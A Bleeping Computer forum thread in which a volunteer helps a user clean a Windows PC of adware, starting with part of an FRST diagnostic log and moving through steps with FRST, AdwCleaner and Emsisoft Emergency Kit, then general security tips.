2015-10-30 18:24 - 2016-02-23 23:19 - 00000826 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 211.29.132.12 - 198.142.0.51
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: Apple Mobile Device Service => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: cphs => 3
MSCONFIG\Services: GfExperienceService => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: Intel® Capability Licensing Service TCP IP Interface => 3
MSCONFIG\Services: Intel® Security Assist => 3
MSCONFIG\Services: isaHelperSvc => 2
MSCONFIG\Services: jhi_service => 2
MSCONFIG\Services: LavasoftTcpService => 2
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: McComponentHostService => 3
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamNetworkSvc => 3
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: SearchProtectionService => 2
MSCONFIG\Services: Stereo Service => 2
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\StartupApproved\Run: => "Web Companion"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{933C174D-60AA-4642-A5BE-989279E1238B}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{3ECB97AD-B8A7-4BB2-A3E8-4F1AF44358EB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{FC5DAEE3-C818-47DE-95BC-7DF8D6E23D06}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{742EEC9F-5CF9-47CD-80E6-F08D7192D0E1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{8ACCD632-5B9C-4F6A-B7D7-FC998820F0F8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{AB0A6656-F880-4669-837D-07A240976BAD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B59FF7DF-3F51-43C9-98EF-D851409D8303}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{57E43343-7D7C-40A7-8A81-50ED85A760DD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D23F4212-AAED-45C5-B24C-370E70B44D52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{BEBEB11E-57DA-42EB-8678-342F8AEA8EBE}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{068ACC00-C710-43A5-86B4-A906CE27D757}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D975E4B7-5E0F-4475-BBA2-3F24F1BD0AD9}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{9E827FEF-51F7-4BD8-94BE-865FA25182BF}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{635BF03A-B7C9-4733-9CBD-A6091EF99F79}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{BA35DE3B-2B8C-46C7-9C7B-C2D48A6523ED}] => (Allow) C:\Users\kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{92C8EF79-17B1-473D-A119-62CE3DADF2BB}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F370A64C-0368-4397-9EB9-BA1DE6B3AE41}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{C6B42A5B-829F-4388-96A8-56881880A07C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{649116C5-D440-4C6E-A0B8-BE0D425D04C7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{A3839923-09A6-4D1A-8B9A-4E2D12E35E89}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{07AD62CB-1C31-4200-8C9D-D850DC1E05AB}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{333F229D-BD98-4645-85E8-2C4D738B71D7}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [{619879CD-6CCA-4A3D-9439-20B31CA0A13F}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [TCP Query User{20E07F8A-7AFD-4AC4-AB47-C99F674B3F63}C:\program files (x86)\origin games\battlefield 4\bf4.exe] => (Allow) C:\program files (x86)\origin games\battlefield 4\bf4.exe
FirewallRules: [UDP Query User{D9654C13-7844-45C1-9835-9CC6348842D5}C:\program files (x86)\origin games\battlefield 4\bf4.exe] => (Allow) C:\program files (x86)\origin games\battlefield 4\bf4.exe
FirewallRules: [TCP Query User{F0AA2A6B-103E-434D-8ED1-100A28C552E6}C:\users\kevin\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kevin\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{0D3166E4-25A8-4900-8947-6F87AF2D6E18}C:\users\kevin\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kevin\appdata\roaming\spotify\spotify.exe
FirewallRules: [{C33BA485-7EED-44A0-B44D-9028E5D0FA47}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{43198E66-D334-4319-9BA7-0E4FCA8FAC08}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5E4CAAD9-F909-4E7B-BFAE-18CD26ACCE51}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{3904D310-F1DB-4420-BF8C-5E4C6F88D9DA}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{19B88D35-EE35-4B71-BD3E-C26F9729806F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{A747C069-4A27-498C-95F2-4DA42B8731B3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{8C42E2F6-06BF-41F0-B0A7-11FC162E2101}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{4759B541-F9A4-4142-A999-63B1BD80C1A7}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{F5009673-1F63-4F8E-B4F2-1B6290EE7C26}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{803B1226-0C60-48B9-B8F4-68ECBC568458}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
 
==================== Restore Points =========================
 
08-03-2016 19:20:52 Scheduled Checkpoint
09-03-2016 14:42:32 Malwarebytes Anti-Rootkit Restore Point
09-03-2016 14:45:08 JRT Pre-Junkware Removal
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (03/09/2016 03:00:46 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program mbar.exe version 1.9.3.1001 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 2b1c
 
Start Time: 01d179b6928b487b
 
Termination Time: 6333
 
Application Path: C:\Users\kevin\Desktop\mbar\mbar.exe
 
Report Id: 797455f0-e5ab-11e5-b58e-bc5ff40bb7ea
 
Faulting package full name: 
 
Faulting package-relative application ID:
 
Error: (03/09/2016 02:56:08 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-USOP2KE)
Description: Package Microsoft.WindowsStore_2016.27.2.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
 
Error: (03/09/2016 02:45:09 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (03/09/2016 02:42:33 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
 
System errors:
=============
Error: (03/09/2016 03:06:03 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{3185A766-B338-11E4-A71E-12E3F512A338}{7006698D-2974-4091-A424-85DD0B909E23}NT AUTHORITYNETWORK SERVICES-1-5-20LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (03/09/2016 03:03:54 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-USOP2KE)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-USOP2KEkevinS-1-5-21-3312796164-3718684029-3865147747-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (03/09/2016 03:03:54 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-USOP2KE)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-USOP2KEkevinS-1-5-21-3312796164-3718684029-3865147747-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (03/09/2016 03:03:54 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-USOP2KE)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-USOP2KEkevinS-1-5-21-3312796164-3718684029-3865147747-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (03/09/2016 03:03:54 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-USOP2KE)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-USOP2KEkevinS-1-5-21-3312796164-3718684029-3865147747-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (03/09/2016 03:00:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_38a85 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (03/09/2016 03:00:46 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (03/09/2016 02:45:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The NVIDIA Display Driver Service service terminated unexpectedly.  It has done this 1 time(s).
 
 
CodeIntegrity:
===================================
  Date: 2016-03-09 15:06:20.223
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 15:06:20.214
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 15:05:26.092
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 15:05:26.083
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 15:02:01.852
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-03-09 14:55:56.035
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-09 14:55:56.025
  Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-03 16:48:16.670
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-03-02 17:19:17.848
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-03-02 12:03:17.545
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-2500K CPU @ 3.30GHz
Percentage of memory in use: 30%
Total physical RAM: 8081.48 MB
Available physical RAM: 5623.64 MB
Total Virtual: 9361.48 MB
Available Virtual: 6780.46 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:232.88 GB) (Free:103.25 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.05 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive g: (FILES) (Fixed) (Total:297.99 GB) (Free:175.54 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 3970C7B2)
Partition 1: (Active) - (Size=232.9 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 00000001)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=298 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================



Edited by Kevin07, 09 March 2016 - 05:37 AM.




#2 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,512 posts
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:02:13 AM

Posted 09 March 2016 - 02:47 PM

Hello
  • Welcome to Bleeping Computer.
  • My name is fireman4it and I will be helping you with your Malware problem.

    Please take note of some guidelines for this fix:
  • Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools.
  • If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
  • Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
  • In the upper right hand corner of the topic you will see a button called Follow This Topic. I suggest you click it and select Immediate E-Mail notification and click on Follow This Topic. This way you will be advised when we respond to your topic and facilitate the cleaning of your machine.
  • Finally, please reply using the Post button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.
  • I will be analyzing your log. I will get back to you with instructions.
1.
  • Download attached fixlist.txt file and save it to the Desktop.
    NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.
  • Run FRST/FRST64 and press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.




2.
Please download AdwCleaner by Xplode and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator
  • The tool will start to update the database, please wait a bit.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[C#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.
How is the machine running now?

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-



If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#3 Kevin07


Posted 10 March 2016 - 01:41 AM

Thanks for your help. It seems like the problem has been solved. I have attached the files requested.




#4 fireman4it


Posted 10 March 2016 - 07:51 AM

Glad to hear things are better. Let's run one more scanner for any leftovers.

Emsisoft Emergency Kit
  • Click here to download Emsisoft Emergency Kit. The download will automatically start after a moment.
  • Save EmsisoftEmergencyKit.exe to your Desktop.
  • Double click on EmsisoftEmergencyKit.exe (Windows Vista/7/8 users: Accept UAC warning if it is enabled). A screen like this will appear:
  • Leave everything as it is, then click Extract. This will unpack Emsisoft Emergency Kit to the EEK folder located in the root drive (usually C:\).
  • Once the extraction is done, an icon will appear on your Desktop. Double click it to start Emsisoft Emergency Kit.
  • Wait for Emsisoft Emergency Kit to finish loading signatures. A screen like this should appear:
  • Choose Yes, then wait for EEK to finish updating.
  • Choose Malware Scan under the Scan button. When EEK asks to activate PUP detection, choose Yes.
  • Wait for the scan to finish.
  • If EEK detects something, all detected items will be displayed. Place a checkmark before everything, then choose Quarantine Selected.
  • If Emsisoft Emergency Kit asks to reboot, please do so immediately.
  • The scan log is located in Logs -> Scan Logs. Click on the entry of the latest scan, choose Export and save the report on your Desktop.
  • Please Copy and Paste the contents of the scan log in your next reply.

Edited by fireman4it, 10 March 2016 - 07:53 AM.


#5 Kevin07


Posted 10 March 2016 - 11:54 PM

Hi,

 

Log is attached.




#6 fireman4it


Posted 11 March 2016 - 06:00 PM

It Appears That Your Pc Is Now Clean!

***



Clean up:

***



Right-click  AdwCleaner.exe and select Run As Administrator.
  • Click on the Uninstall button.
  • A window will open, press the Confirm button.
  • AdwCleaner will uninstall now.


***



Clean up with delfix:
  • Please download delfix to your desktop.
  • Close all other programs and start delfix.
  • Please check all the boxes and run the tool.
  • delfix will now delete all found traces of our removal process.

***



Delete the log files our tools created; they are located at your desktop or at the
"c:\users\{.......}\Downloads" folder.
Highlight them, and press the del or delete key on the keyboard.
You can browse to the location of the file or folder using either My Computer or Windows Explorer.

***



Here are some Preventive tips to reduce the potential for spyware infection in the future

Step 1: Browse more securely


Step 2: Make sure you keep your Windows OS current.
  • Windows XP users can visit Windows update regularly to download and install any critical updates and service packs.
  • Windows Vista / 7 / 8 users can update via
    Start menu > All Programs > Windows Update > Check for Updates (in left hand task pane).

Step 3: Avoid P2P
  • If you think you're using a "safe" P2P program, only the program is safe, not the data.
  • You will share files from unsafe sources, and these may be infected.
  • Some bad guys use P2P filesharing as an important channel to spread their wares.

Step 4: Use only one anti-virus software and keep it up-to-date.

Step 5: Firewall
Without a firewall your computer is susceptible to being hacked and taken over. I am very serious about this and see it happen almost every day with my clients. Simply using a Firewall in its default configuration can lower your risk greatly.

Step 6: Backup regularly
You never know when your PC will become unstable or become so infected that you can't recover it.

Step 7: Use Strong passwords!

Step 8: Email attachments
Do not open any unknown email attachments, which you received without asking for it!


Extra note:
Keep your Browser, Java, pdf Reader and Adobe Flash Up to Date.
And you could install Malwarebytes Anti-Exploit to run alongside your traditional anti-virus or anti-malware products.

Make sure your programs are up to date - because older versions may contain Security Leaks.


#7 Kevin07


Posted 12 March 2016 - 11:32 PM

Thank you for your time!



#8 fireman4it


Posted 14 March 2016 - 07:53 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.




